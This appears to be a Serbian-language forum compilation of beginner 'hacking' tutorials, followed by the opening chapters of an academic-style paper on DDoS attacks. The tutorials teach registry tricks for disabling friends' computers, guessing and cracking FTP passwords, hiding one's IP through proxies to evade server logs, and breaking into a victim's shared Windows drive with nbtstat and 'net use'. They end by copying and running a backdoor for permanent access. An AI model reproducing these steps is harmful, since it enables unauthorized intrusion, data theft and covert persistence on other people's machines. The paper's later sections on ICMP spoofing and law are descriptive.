Hakovanje Windows-a[Regedit - Registry Editor]
Ovo zapravo i nije 'hakovanje' kao sto su upadi u sisteme i slicno. Ovo je zapravo izmena samog Windowsa i maksimalno koriscenje onoga sto nam Windows pruza. Za veliki broj operacija bice vam potrebno znanje rada u regeditu. Ukoliko znate da rukujete regeditom odlicno, ukoliko ne... naucicete. Program Regedit mozete naci u Windows direktorijumu c:\Windows\Regedit.exe, a mozete ga veoma jednostavno pokrenuti ako kliknete na start, zatim na run i unesete REGEDIT.
- Gde je Shut Down?Ovaj trik vam moze pomoci da uplasite i prevarite lamere. Ovime ce te sakriti dugme shutdown iz start menia tako da se kompjuter ne moze ugasiti klikom na Shut Down. Startujte regedit i prvo napravite backup (kako bi mogli da vratite Shut Down dugme) tako sto ce te kliknuti na 'Registry' pa na 'Export Registry File', sada unesite ime fajla (bilo koje npr. backup1.reg) i kliknite na save. E, sada mozete poceti sa uklanjanjem Shut Down dugmeta. Idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Sada napravite novi 'String Value' tako sto ce te ici na 'Edit', 'New' i na 'String Value' i dacete mu ime NoCloseKey. Sada kliknite desnim tasterom na ovaj String Value, kliknite na 'Modify' i unesite 1 u polje Value Data. Shut Down iz start menia sada ce biti onemogucen. Kada budete zeleli da ponovo omogucite Shut Down potrebno je samo da pokrenete buckup koji ste na pocetku napravili (backup1.reg) i dugme ce biti vraceno.
NAPOMENA: PRE BILO KAKVE OPERACIJE NAD REGEDITOM PRETHODNO NAPRAVITE BACKUP O KOME SAM MALO PRE GOVORIO ('KLIKOM NA EXPORT REGISTRY FILE' KAKO BI KASNIJE MOGLI DA VRATITE PRVOBITNA PODESAVANJA.
- A: B: C: D:
Jos jedan mali trik da prevarite vase prijatelje. Zapravo, ovim trikom ce te iz My Computer-a ukloniti sve drajve (Flopi, Hard Disk itd...) Pokrenite regedit idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Ovde napravite novi 'DWord Value' i dajte mu ime NoDrives. Sada samo modifikujte njegovu vrednost na 3FFFFFF (Hexadecimal).
- Screen Saver trik
Da bi ste ukjucili i iskljucili screen saver idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers
Napravite novi 'String Value', dajte mu ime Mouse Corners i dajte mu vrednost -Y da ukljucite i -N za suprotno. Sada kad god pomerite mis u gornji desni ugao ekrana pokrenuce se screen saver, a kada ga budete pomerili na donji levi ugao screen saver ce se ugasiti.
- Brisanje ikonica preko regedita
Sta mislite, da li je moguce obrisati Recycle Bin? Nema nikakve logike, ali jeste. Pored toga, mozete obrisati i My Computer ikonicu, kao i dosadnu Network Neighborhood ikonu. Da bi ste to uradili idite na
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
- gde je {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} oznaka ikonice koju zelimo da uklonimo. Oznake ikonica se nalaze u sledecoj listi:
My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D}
Desktop: {00021400-0000-0000-C000-0000000000046}
Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D}
Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48}
Fonts: {BD84B380-8CA2-1069-AB1D-08000948534}
Inbox :{00020D76-0000-0000-C000-000000000046}
My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D}
Printers :{2227A280-3AEA-1069-A2DE-O8002B30309D}
Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E}
The Microsoft Network:{00028B00-0000-0000-C000-000000000046}
History: {FF393560-C2A7-11CF-BFF4-444553540000}
Winzip :{E0D79300-84BE-11CE-9641-444553540000}
Dakle ukoliko npr. zelimo da obrisemo Recycle Bin icice mo do: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{645FF040-5081-101B-9F08-00AA002F954E}
i obrisacemo ovaj kljuc. Ovime ce mo ukloniti ikonicu Recycle Bina. Kada zelite ikonicu nazad... pokrenite backup!
- Zanimljiv toolbar
Ucinite Win Explorer i Internet Explorer lepsim, postavite sliku na toolbaru. Da bi ovo uradili idite na:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Internet Explorer\Toolbar\
Sada napravite novi 'String Value' sa imenom BackBitmap i podesite mu vrednost (modify) na putanju do slike koju zelite da stavite na toolbar u *.bmp formatu (npr. C:\Windows\Slika.bmp). Sada ce Windows Explorer i Internet Explorer imati sasvim novi izgled!!!
[Zavesna rec]
Ovo je bilo samo nesto osnovno sto se moze izvesti uz pomoc Regedita, pa cak uz ovu alatku mozete da poboljsate performanse vase internet konekcije na maksimalni nivo. Ostaje vam samo da sami eksperimentisete, ali ne zaboravite da uvek napravite backup pre nego sto bilo sta izmenite u regeditu.
Hakovanje FTP-aPre svega zelim da vam objasnim znacenje reci
[You must be registered and logged in to see this link.] FTP je skracenica od engleskih reci 'File Transfer Protocol' sto bi na nasem jeziku znacilo 'protokol prenosa fajlova'. Kao sto sam naziv kaze FTP je protokol koji sluzi za prenos fajlova od servera do klijenta. Server je kompjuter na koji ste vi konektovani, a klijent ste vi sami. Svaki sajt ima svoj odredjeni FTP server na koji se uploaduje sadrzaj sajta. Da bi se konektovali na FTP server moramo da imamo odredjeni FTP software poznat kao FTP klijent. Zapravo, sam Windows dolazi sa FTP klijentom koji je pomalo tezak ukoliko se ne snalazite bas najbolje u MSDOS-u. Ovaj program mozete naci u sledecem folderu:
C:\windows\
[You must be registered and logged in to see this link.]Program ce se automatski sam pokrenuti i ako u MSDOS-u samo ukucate
[You must be registered and logged in to see this link.] Tada ce vam se umesto odzivnog znaka c:\> pojaviti:
ftp>
Ovo znaci da je FTP klijent pokrenut. Pre nego sto pocnete sa FTP Hacking-om morate prethodno da znate i FTP komande. Spisak komandi ce te dobiti ako ukucate help:
ftp> help
Takodje mozete umesto help ukucati i samo znak ?
Kada ovo ukucate dobicete listu FTP komandi koja izgleda ovako:
Commands may be abbreviated. Commands are:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
ftp>
Sada ce mo svaku vazniju naredbu obraditi zasebno. Naime, pokusacu da vam objasnim cemu koja komanda sluzi i kako se koristi.
OPEN - ova naredba sluzi za konektovanje na FTP server. Koristi se u sledecem obliku:
ftp> open ime_hosta.com
DISCONNECT - kao sto prethodna komanda sluzi za konektovanje na FTP server, tako ova sluzi za diskonektovanje sa servera. Za njeno koriscenje samo ukucete DISCONNECT i to je to.
GET - ukoliko zelite da preuzmete (download-ujete) neki fajl sa servera, onda koristite ovu komandu:
ftp> get fajl.txt
MGET - kada zelimo da preuzmemo vise fajlova od jednom, onda ne mozemo koristiti naredbu GET vec cemo koristiti MGET:
ftp> mget *.txt
PUT - ova neredba koristi za slanje (upload-ovanje) fajlova na server:
ftp> put fajl.txt
MPUT - za slanje vise fajlova na server koristi se naredba MPUT:
ftp> mput *.txt
Ovo su neke od osnovnih komandi koje su vam potrebne, a ukoliko vam je potrebna pomoc za odredjenu komandu, onda ce te uneti sledece:
ftp> help {komanda}
Gde je {komanda} odredjena komanda za koju vam treba pomoc.
Na primer, ukoliko zelim da naucim kako se koristi komanda CD ja cu da ukucam ovu komandu:
ftp> help CD
FTP program ce prikazati sledece:
cd Change remote working directory
Sada kada znamo osnovne FTP komande mozemo da isprobamo rad sa FTP-om. Pre svega potrebno je da se konektujemo na odredjeni FTP server. Pokrenimo MSDOS i ukucajmo
[You must be registered and logged in to see this link.] Tada cemo pokrenuti FTP klijent. Za konektovanje na server unesite sledece:
ftp> open ime_servera.com
Gde je ime_servera.com bilo koji server na koji zelite da se konektujete (npr. hotmail.com ili ptt.yu). Pogledajte sledeci primer da bi vam bilo jasnije.
ftp> open web2.mtnl.net.in
Ova komandom cu da se konektujem na server web2.mtnl.net.in
Nekon sto se konektujemo na FTP server, docekace nas neka vrsta banera za dobrodoslicu koji izgleda ovako:
Connected to web2.mtnl.net.in.
220-
220-#*************************************************************
220-# Welcome to MTNL's ftp site
220-#*************************************************************
220-#
220-# You can upload your own homepages at this site!!!
220-#
220-# Just login with your username and upload the HTML pages.
220-# (You can use your favourite HTML editor as well)
220-#
220-# World will see it at
[You must be registered and logged in to see this link.]220-#
220-# So get going......UNLEASH YOUR CREATIVITY !!!!
220-#
220-#*************************************************************
220-
220 ftp2.mtnl.net.in FTP server ready.
User (web2.mtnl.net.innone)): forbidden
331 Password required for forbidden.
Password:
Kao sto i sami vidite za ulazak na FTP server potreban je password. Sada vi sigurno mislite 'pa koj ce mi to k*rac kada ne znam password?' Stvar je u tome sto veliki broj FTP servera dozvoljava takozvane anonimne ulaze. To znaci da ce te kao password iskoristiti anonymous i moci ce te da upadnete u server i izvrsite upload ili download fajlova. Ali na nasu zalost postoje i serveri koji ne dozvoljavaju anonimne ulaze, vec zahtevaju odredjeni password. Da bi upali u ovakav server ne postoji drugi nacin osim da provalimo password. Predlazem da prethodno kao password isprobate ime samog servera, a ukoliko to nece probajte neki password sa sledece kratke liste:
admin 12345
administrator abc
pass qwerty
password
open
enter
Ukoliko nece ni jedan od ovih passworda onda vam preporucujem jedan lamerski, ali efikasan nacain: da nabavite neki program za krekovanje FTP passworda. Na mom sajtu mozete naci odlican program za te svrhe, a zove se Crack
[You must be registered and logged in to see this link.] O samom programu ne trebam mnogo da vam pricam jer je veoma jednostavan za koriscenje. Potrebno je samo da unesete adresu FTP servera, kliknete na CRACK i sacekate da vam se pojavi password FTP servera.
Dakle uspeli smo sada da nabavimo password i upascemo u FTP server, ali tu nastaje jedan problem. Svaki upad u FTP server ostavlja log na kome se vidi da je neko usao u server. Tacnije u logu se vidi nasa IP adresa, a ukoliko neko zna nasu IP adresu, vrlo lako ce nas uhvatiti. Najbolji nacin za sakrivanje IP adrese je koriscenje Firewall-a, WinGate-a, Proxy-a. Ukoliko neznate sta je to, evo malog objasnjenje u nekoliko crta. Proxy je zapravo server na koji se mi konektujemo i koji nam daje laznu IP adresu tj. adresu proxy servera tako da ce se, ukoliko upadnemo u FTP server, u logovima pojaviti adresa proxy servera umesto nase. Sve ovo radi na sledecem principu:
Localhost --> Proxy Server --> FTP Server --> Proxy Server --> Localhost
Posto ja predpostavljam da vi nikad niste koristili neki od proxy servera, morace te da iskoristite program koji se naziva Proxy Redirect i koji se takodje nalazi na mom sajtu. Sam program je veoma jednostavan i dolazi sa velikom listom proxy servera. Takodje i vi sami mozete pronaci proxy servere ako u Google-u ili Yahoo-u ukucate 'proxy server'. Uz pomoc ovog programa bicete potpuno zasticeni i ne postoje nikakve sanse da budete uhvaceni. Detaljno objasnjenje o ovom programu nalazi se u njegovom Readme.Txt fajlu.
Sada smo totalno spremni za upad u FTP server. Dakle, pokrenuli smo proxy server, konektovali se na FTP server i sta sada? E sada je veoma jednostavno! Recimo da zelimo da dodjemo do odredjenog fajla koji se naziva SIFRE.DOC i koji se nalazi u direktorijumu PASS. Da bi ovo uradili pratite sledeci postupak:
ftp> cd pass
Ovom komandom uci ce mo u direktorijum (folder) pod imenom pass. Posto se sada nalazimo u folderu u kome se nalazi zeljeni fajl koji zelimo da download-ujemo, potrebno je izvesti sledeci korak:
ftp> get SIFRE.DOC
Ovime smo otpoceli download naseg zeljenog fajla.
Ukoliko zelimo da vidimo spisak svih fajlova i direktorijuma na serveru unesite samo komandu DIR i spisak ce vam se pojaviti. Nakon sto smo download-ovali zeljeni fajl sa servera ukucacemo DISCONNECT kako bi se diskonektovali tj. kako bi napustili FTP server.
Takodje bih trebalo da spomenem i komandu SYST koja je veoma interesantna. Naime, ona sluzi za prikaz informacija o sistemu FTP servera tj. informacija o operativnom sistemu i verziji FTP-a. A ukoliko to znamo mozemo pronaci odredjeni propust (rupu) u sistemu, ali o tome cemo nekom drugom prilikom...
Nadam se da sam vam bar priblizno objasnila upade na FTP servere. A sada nemojte bas da pravite veliku stetu, jer ipak... nije nam to cilj
Upadanje preko IP AdreseKao prvo zelim da vam objasnim da se necu detaljno zadrzavti na nekim stvarima kako ovo ne bi isuvise bilo komplikovano za "novodosle hakere", jer je ovo ipak tutorial za pocetnike. Ako zelite vise informacija o File Sharingu potrazite ih na NETU.
Ukoliko niste znali Windows ima opciju koja se zove File and Print Sharing. Ovu opciju mozete koristiti ukoliko zelite da delite drajv i stampac sa drugima, sto znaci da ce te dati pristup ostalim ljudima (celoj mrezi) fajlovima i stampacu. Kada ukljucite ovu opciju, vi zapravo ostavljate jedan port otvoren (port 139) koji prihvata konekciju i razume NETBIOS protokol.
U nekim malim firmama (sa LANom) ovo moze da bude i korisno. Na primer, umesto da postoji nekoliko stampaca za svaki kompjuter posebno, koristi se samo jedan stampac koji se nalazi na kompjuteru na kome je ukljucen File and Print Sharing. Ali ukoliko vi koristite Fajl Sharing na vasem kucnom kompjuteru (vidjao sam likove koji ovu opciju imaju ukljucenu, a ni neznaju - jadnici!) koji je konektovan na internet, svako na svetu ko zna vasu IP adresu, moze imati pristup vasem racunaru.
Ukoliko neznate da li je vama ukljucena Fajl Sharing opcija samo idite na Control Panel / Network. Sada trebate da vidite prozor na kome se nalazi spisak svog mreznog software-a koji ste instalirali, kao sto je TCP/IP i dugme File and Print Sharing. Proverite da li je opcija cekirana. Ukoliko jeste (file sharing je ukljucen) onda je uncekirajte tj iskljucite.
[Krecemo sa upadom]
Sada cu vam objasniti nacin na koji mozete da upadnete na kompjuter gde je ukljucen Fajl Sharing. Cinjenica za to da Windows nije bezbedan je to sto alati za hakovanje se nalaze u samom Windowsu. Programi koji su vam potrebni za ovo su Nbtstat.exe i Net.exe. Oba programa se mogu naci u folderu C:\Windows, ali ukoliko ih tamo ne nadjete, onda ih potrazite na instalacionom CD-u Windowsa. Ovi programi se pokrecu iz MS-DOS Prompta. Da bi ste videli pomocni meni (help) za Nbtstat.exe samo ukucajte nbtstat /? i za Net.exe ukucajte net /?. Sada krenimo u akciju. Prvo vam je potrebna IP adresa ili host kompjutera u koji upadate. Recimo da upadate u komjuter ciji je host computer.isp.com i IP adresa 123.45.67.8. Prvo sto trebate da uradite jeste to da proverite da li je FileSharing na tom kompjuteru ukljucen. To izvedite tako sto ce te ukucati:
nbtstat -a IMEHOSTA
- ili
nbtstat -A IPADRESA
Bitno je da na drugom nacinu ukucate veliko A. Malo je to cudno zato sto DOS nije CASE SENSITIVE, ali tako to radi. Sada mozete da dobijete dve vrste odgovora. Jedan koji ce reci "Host Not Found" i koji nam govori da na kompjuteru nije ukljucen FileSharing (ili da ste pogresili IP adresu) i drugi koji ce vam dati spisak imena (names) type i status koji znaci da ste na pola puta od ulaska u komp. Tabela bi trebala da izgleda ovako:
Name Type Status
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered
Kako sada da upadnete? Lako! Prvo morate da podesite Lmhosts fajl koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoc notepada, a ukoliko ga nema u Windows direktorijumu, onda ga napravite sami (samo ne zboravite da se fajl zove 'Lmhosts' i da NEMA EKSTENZIJU). Da bi ste ga napravili samo otvorite Lmhosts fajl u notepadu, unesite zrtvinu IP asresu, pritisnite TAB, i unesite 'Share Name' - ime koje ste nasli uz pomoc nbtstat-a (u tabeli). Sada snimite ovaj fajl i izadjite iz notepada. Sada postoje dva nacina na koji mozete da pristupite kompjuteru: najlaksi, lak i kul nacin!!!
[Najlaksi nacin]
Imate IP adresu? Imate Share name? OK! Idite na START > RUN i samo unesite sledece:
//IPADRESA/SHARENAME/
na primer:
[You must be registered and logged in to see this link.]Ovime ce vam se pojaviti prozor slican onome koji dobijete kada kliknete na My Computer ikonu iz koga ce te moci da pretrazujete zrtvin kompjuter.
[Lak nacin]
Ukoliko ne zelite previse da se mucite onda samo idite na START / FIND / COMPUTERS i unesite IP adresu kompjutera u koji zelite da upadnete. Ukoliko ste dobro konfigurisali Lmhosts fajl, izacice vam prozor sa fajlovima iz zrtvinog kompjutera. Fakticki bice kao da radite na svom kompjuteru.
[Kul nacin]
Za kul nacin upada u komp uz pomoc file shareinga bice vam potreban program Net.exe. Savetujem vas da prvo procitate pomoc tako sto ce te uneti net /?. (u DOS prozoru). Takodje mozete koristiti i komandu:
net opcija /? - gde je opcija odredjena opcija za koju vam treba pomoc.
Da bi ste pristupili kompu na ovaj nacin morate prvo kreirati virtualni drajv. Ovo ce te uraditi ako ukucate:
net use drajv \\[IPADRESA]\[SHARENAME]
Sada cemo prouciti komandu:
- 'drajv' je oznaka virtualnog drajva koji moze biti f: g: z: x: itd...
- '[IPADRESA]' je IP adresa kompjutera u koji upadamo (npr. 123.45.67.
- '[SHARENAME]' je Share Name tj. ime koje ste nasli uz pomoc nbtstat-a (u tabeli).
Komanda izgleda nesto slicno ovome:
net use x:\\123.45.67.8\hostbug
Nakon sto izvrsite ovo, samo ukucajte slovo drajva (u nasem primeru x i pretrazite drajv uz pomoc MS-DOS komandi.
Mozete dodatno ulepsati stvar:
Iskopirajte backdoor (zadnja vrata) na virtualni drajv i pokrenite ga kako bi uvek imali pristup ovom kompjuteru. Ukoliko kopirate i pokrecete backdoor uradite to na sledeci nacin:
copy c:\backdoor.exe x:
x:
run=%SystemRoot%\backdoor.exe
Ovo ce pokrenuti backdoor na zrtvinom kompjuteru i omoguciti vam stalni pristup ovom kompjuteru. Ovo je kraj teksta o upadima na kompjutere koji imaju ukljucen File Sharing... sledeci put mozda malo i vise o tome, ali do tada nabavite neke dobre NT FileSharing tekstove sa neta i prostudirajte ih.
Kao sto bi rekao Dennis Huges iz FBI-a:
"Jedini sigurni komputer na svetu je onaj koji je iskljucen, zakljucan u sefu i zakopan 20 metara pod zemljom na tajnoj lokaciji... mada ni za njega nisam previse siguran."
KOMPLETNO O DOS NAPADIMANapomena: ova tema ce se malko vise razvijati. Sledeci postovi su vezani za ovaj naslov i za ovu temu.
1. Uvod
Cilj ovog rada je da se ukaže na problem koji je u prethodne 3 godine postao jedan od najistaknutijih problema vezanih sa internetom i mrežama u celini. Većina korporativnih mreža, bilo da se radi o internet provajderima ili da se radi o manjim korporacijama su podložni različitim vrstama napada koji smanjuju operativnu moć koje računarske mreže pružaju tim kompanijama.
Da bi smo rad pravilno struktuirali i čitaocu ovog rada omogućili lakše uključivanje u materiju započeo sam sa osnovnim stvarima i istorijom računarskih mreža da bih preko objašnjena kako ona funkcioniše i koji su to metodi i načini na koji ona stvarno radi omogućio objašnjenje početnih pojmova neophodnih za dalju raspravu.
Takođe u ovom delu sam napravio i mali osvrt na pojmove zaštite podataka i sa pravnog i fizičkog aspekta da bih bolje objasnio kako to sve izgleda u našoj sredini.
Treće poglavlje se bavi temom Privatnosti kao oblasti koja kod nas nije preterano zastupljena niti potencirana dok joj se na zapadu pridaje ogromna važnost. Zaštita privatnosti elektronskih poruka ili prosto zaštita lične privatnosti je jedno od osnovnih načela koje važi u zapadnom zakonodavstvu, i ovim bih hteo da možda potencijalno otvorim to pitanje i u našoj sredini.
Četvrto poglavlje se bavi pretečama DDOS napada koji je tema ovog rada. Želja mi je bila da prikažem kako su i pre DDOSa korporativne mreže bile ugrožene od strane nesavesnih i zlonamernih korisnika. Ništa manje opasni nisu bili ni ti metodi koji su korišćeni kao što je lažno predstavljanje putem e-maila, neovlašćeno korišćenje e-maila u propagandne svrhe i na kraju kao pretečama distribuiranog napada.
U petom i šestom poglavlju sam i započeo najzanimljiviji deo rada za mene, to jest samu DDOS tehniku napada, i pokušao sam da pružim detaljan prikaz na koji način sve to funkcioniše i koji su potencijali takvog jednog ugrožavanja korporativne mreže. Takođe dajući prikaz aktivnost jednog TFN servera sa raznim alatima za praćenje mrežnog saobraćaja želeo sam čitaocu da pružim kvalitetniji i detaljniji pregled ove materije. Pokušao sam i da objasnim koje su to slabosti koje postoje u načinima odbrane i metodama za lokalnu odbranu.
Na kraju umesto zaključka želeo sam da svoje dugogodišnje iskustvo koje sam stekao kao sistem administrator računarske mreže na Univerzitetu “Braća Karić”, pretvorim u niz saveta koji mogu poslužiti kao uputstvo i vodiči kako da se pokuša uspešno braniti jedna korporativna mreža i koje su osnovne mere predostrožnosti i zaštite.
Kao što sam već naveo na samom kraju ne postoji nikakav apsolutni metod zaštite ni jedne korporativne mreže, već se sve svodi na to da korporacija neprestano ulaže resurse u modernizaciju same računarske mreže i da se sami administratori moraju non stop edukovati o novim metodama i tehnikama kako napada tako i odbrane.
2. Mreže
2.1 Pojam, istorija i razvoj
Pod pojmom mreže podrazumevamo skup računara i uređaja koji su sposobni da međusobno komuniciraju često i na velike daljine razmenjujući pri tom informacije preko posredujućih računara.
Internet mreža je nastala iz razvoja ARPA NET koji je bio prva vrsta mreže kakve danas poznajemo i bila je korišćena za potrebe američke vojske koja ju je razvila da bi mogla da komunicira na velike daljine kao i da povežu institucije koje su bile od ključnog značaja za američku vojsku.
Kasnije su se na tu mrežu polako povezivali i univerziteti i to je bio prvi oblik mreže i mrežnog okruženja kakvo danas poznajemo. Sa razvojem prednosti korišćenja mreže u poslovnom okruženju pojavile su se i opasnosti i mane kojih su kompanije morale biti svesne pre upuštanja u rizik zvani poslovanje na mreži.
Jedna od najviše spominjanih opasnosti, o kojoj će i biti reči u ovom radu, je opasnost od gubljenja podataka i o onemogućavanju razmene istih usled ugrožavanja sigurnosti same mreže.
Sigurnost mreže i podataka na računarima može biti ugrožena na razne načine ali nazivi koje se najčešće spominju u vezi toga su hakovanje (eng. hacking) i hakeri (eng hackers).
2.2 Mrežni protokoli
Protokol je jezik koji se koristi za komunikaciju između dva računara koji su povezani u mrežu, gde protokol definiše kako se podaci pakuju za prenos preko mreže kako bi računar koji ih prima mogao da ih korektno raspakuje Neophodno je da računari na istoj mreži koriste isti protokol za komunikaciju.
Protokol koji će ovde imati presudnu ulogu jeste ICMP (internet message control protocol-internet protokol kontrolnih poruka)
ICMP-internet protokol kontrolnih poruka obezbeđuje mehanizam prijave greški i kontrolnih poruka TCP/IP (transfer control protokol/internet protokol) protokolu kao osnovnom protokolu za komunikaciju na mrežama otvorene arhitekture kao što je Interent.
Funkcije koje ICMP protokol obavlja:
• Poseduje eho poruke i poruke potvrde kojima se testira pouzdanost veze između dva računara.Ovo se postiže upotrebom PING komande
• Redirekciju saobraćaja, radi poboljšanja rutiranja u slučaju zagušenja rutera pri obimnom mrežnom saobraćaju.
• Šalje poruke o isteku vremena predviđenog za egzistiranje paketa (istek vremena predviđenog parametrom TTL)
• Šalje zahtev ruteru za dobijanje adresa svih rutera na mrežnom segmentu.
• Obezbeđuje slanje poruka računaru sa direktivom za usporavanje saobraćaja , u slučaju da je ruter opterećen
• Utvrđuje masku podmreže mrežnog segmenta.
Format ICMP paketa
Tip
Kod
Kontrolna suma
Tipski podatci
Polje promenjive dužine
Polja ICMP paketa:
Polje
Opis
0-Mreža nedostupna
1-Računar nedostupan
2-Protokol nedostupan
3-Port nedostupan
4-Potrebna fragmentacija
5-Neuspešna izvorna ruta
6-Odredišna mrea nije poznata
7-Odredični računar nije poznat
8-Izvorišni računar izolovan
9-Komunikacija sa odredišnom mrežom nije administrativno dozvoljeno
10-Komunikacija sa odredišnim računarom nije administrativno dozvoljena
11-Mreža nedostupna za taj tip servisa
12-Računar nedostupan za taj tip servisa
Dodatne informacije koje nepostoje u polju za tip
Detekcija greške za ICMP deo
Sadržaj ovog tipa zavisi od tpa funkconalnost koju ICMP pruža. Ukoliko je Echo Reguest/Echo Reply (najčešći slučaj),ovo polje sadrži indetfikator i broj sekvence koje se koristi pri svakom slanju Echo zahteva i odgovara
Zbog same prirode ICMP protokla hakeri mogu da eksploatišu sam protokol na taj način što mogu da u polja ICMP protokola upisuju one podatke koji nisu po ustaljenim vrednostima obuhvaćene u samom protokolu.Odnosno svaki paket koji šalju na odredišnu adresu nemora da ima njenu stvarnu polaznu adresu, tako da na taj način mogu da pošalju pakete na raličite adrese sa polaznom adresom targetirane mreže i tako da se odgovori koji su poslati vraćaju na adresu targetirane mreže i na taj način stvaraju zagušenje targetiranoj mreži.Ovakav vid hakerskih aktivnosti predstavlja osnov distribuiranih napada na mreže.
2.3 Pojam haker/hakovanje
Pojam haker (eng. hacker) u svom značenju opisuje osobu koja se bavi istraživanjem mogućnosti računara i njihovoj primeni u svakodnevnom životu inače prvi put pomenut sredinom 70-tih godina kada su dva studenta sa MIT-a koristeći trikove(hackove) ušli na Univerzitetski mejn frejm.
Hakeri se još i definišu i kao ljudi koji su po prirodi radoznali, koji vole sve da saznaju i ne vole kad je nešto sakriveno od njih. Tokom godina pojam haker je počeo da se vezuje za ljude koji neovlašteno ulaze (tačniji pojam je upadaju) na razne računarske sisteme i manje ili više uspešno pokušavaju da ovladaju sistemom. Takođe se pojavljuju različiti stavovi da li su hakeri u stvari loši (jer neovlašteno pristupaju raznim računarskim sistemima) ili su dobri (jer pokazujući da postoje propusti u sigurnosti nas teraju da unapređujemo svoje programe i sisteme zaštite).
2.4 Pojam zaštite elektronskih podataka
Godinama se napad na računarske mreže rešavao dobrim katancem i pravilnim zaključavanjem kancelarije koje imaju računare sa osetljivim podacima. Bilo je dovoljno imati i dva čuvara čiji bi posao bi da paze da neko fizički ne provali u kancelariju i tu na licu mesta pokuša da prisvoji ili uništi određene podatke koje smo hteli da sačuvamo.
Uvođenjem računarske mreže u kancelarijski način rada a posebno sa uvođenjem interneta i klijent/server arhitektura sam koncept zaštite elektronskih podataka morao je da doživi dramatičnu promenu.
Sada više nije bilo neophodno biti fizički prisutan u prostoriji gde se nalazi računar na kome se nalaze poverljivi podaci. Napad je mogao biti izvršen i iz susedne prostorije ili sa drugog kontinenta, a podaci preneseni bez vidljivog uznemiravanja čuvara koji su sedeli ispred prostorije.
Koncept sigurnosti je sada shvatan ne kao fizičko obezbeđivanje prostorije već kao niz sofisticiranih tehnika i metoda kojim bi sam računarski sistem bio zaštićen i obezbeđen.
2.5 Pojam zaštite elektronskih podataka pravni aspekt
Predlogom novog krivičnog zakonika definisani su kriterijumi šta se sve može smatrati pod krivičnim prekršajem vezano za temu računara i računarskih komunikacija.
•Neovlašćeni pristup i korišćenje računarskih sistema i mreža
•Namerno oštećivanje računarskih programa i podataka- Sabotiranje rada računarskih sistema i mreža
•Pravljenje virusa i njihovo unošenje u računarske sisteme
•Ometanje funkcionisanja sistema za elektronsku obradu podataka i računarskih mreža
•Povreda tajnosti elektronske pošte
•Sprečavanje ili ograničavanje pristupa računarskim mrežama
•Neovlašćeno prikupljanje i objavljivanje privatnih fotografija, spisa i ličnih podataka
•Prisluškivanje
•Uvreda i kleveta
•Objavljivanje zabranjenog pornografskog materijala (pedofilija)
•Posredovanje u vršenju prostitucije
•Povreda intelektualne svojine (copyright)
•Narušavanje poslovnog ugleda
•Oštećivanje mrežnih kablova
•Terorizam- Špijunaža
•Izazivanje panike i nereda
•Udruživanje radi vršenja kriminalnih dela (ugovaranje akcija, prikrivanje dokaza, itd)
Član 34 krivičnog zakona o kompijuterskom kriminalu
Svi ovi predlozi zakona imaju jako dobru osnovu, međutim problem koji se javlja leži u samom okviru zakona, “Nevin dok se ne dokaže krivim” , jer mogučnost dokazivanja ovakve vrste kriminalnih radnji graniči se sa teoretskom neverovatnošću, iz jednostavnog razloga što kod nas nepostoji obučen pravosudni kadar koji bi mogao da procesira ovakav slučaj. Što znači , da ukoliko se počinilac sam neprijavi, skoro da nepostoji šansa da mu se uđe u trag.
U Jugoslaviji se trenutno obučava oko 10 sudija, tužilaca i branioca za ovu vrstu kriminalnih radnji, tako da će u skorije vreme i kod nas postojati strah od zakona na internetu.
2.6 Podela mogućih napada na računarsku mrežu
Za samu računarsku mrežu pojmovi blizu ili daleko imaju potpuno promenjeno značenje.
Pod lokalnim pristupom (local access) smatra se rad korisnika koji je uredno prijavljen na računarski sistem i sve radnje obavlja na samom sistemu (rad u shell-u, kontrolisanje elektronske pošte ili surfovanje sa samog računara- lynx ) odnosno kada je početna adresa korisnika jednaka krajnjoj adresi.
Pod pristupom na daljinu (remote access) podrazumevamo rad pri kojem korisnikova početna adresa paketa nije ista kao i krajnja adresa servera na kome radi.
Pojavom UNIX/LINUX kao operativnih sistema koji u potpunosti podržavaju mrežni rad, stvari se još dodatno komplikuju.
Kada korisnik sa svog računara pokušava da inicira sesiju na nekom serveru sam pristup tom serveru se smatra kao pristup na daljinu (remote access) ali sav rad koji obavlja na tom serveru, a tiče se samog boravka na serveru, se smatra radom u lokalu. (primer remote access ssh sesije na jedan server, ali se čitanje pošte iz PINE smatra lokalnim pristupom, jer za taj server sam program i jeste iniciran iz lokala)
Samim tim pri zaštiti računarskih mreža moramo voditi računa i o jednom i o drugom pristupu kao o načinima na koji se potencijalno može ugroziti sigurnost.
Kada pričamo o napadu na računarsku mrežu moramo kvalifikovati sam pojam napada, šta on znači za nas i kako se odražava na nas kao vlasnike računarske mreže.
Napadom na računarsku mrežu se smatra svaka aktivnost koja je usmerena ka tome da izazove ugrožavanje privatnosti, usporavanje ili ometanje normalnog odvijanja procesa rada u samoj računarskoj mreži.
Sami napadi na računarsku mrežu i sisteme mogu se podeliti na sledeće kategorije:
•ugrožavanje privatnosti
•zloupotrebe elektronske pošte
•potpuno ili delimično prekidanje servisa (Denial of Service)
•neovlašćeno ulaženje na računarski sistem
3. Ugrožavanje privatnosti
3.1 Privatnost kao pojam
Privatnost je moć da se kontroliše ono što drugi ljudi znaju o vama. Tačnije: to je mogućnost da se kontroliše istina o vama koju ostali ljudi znaju.
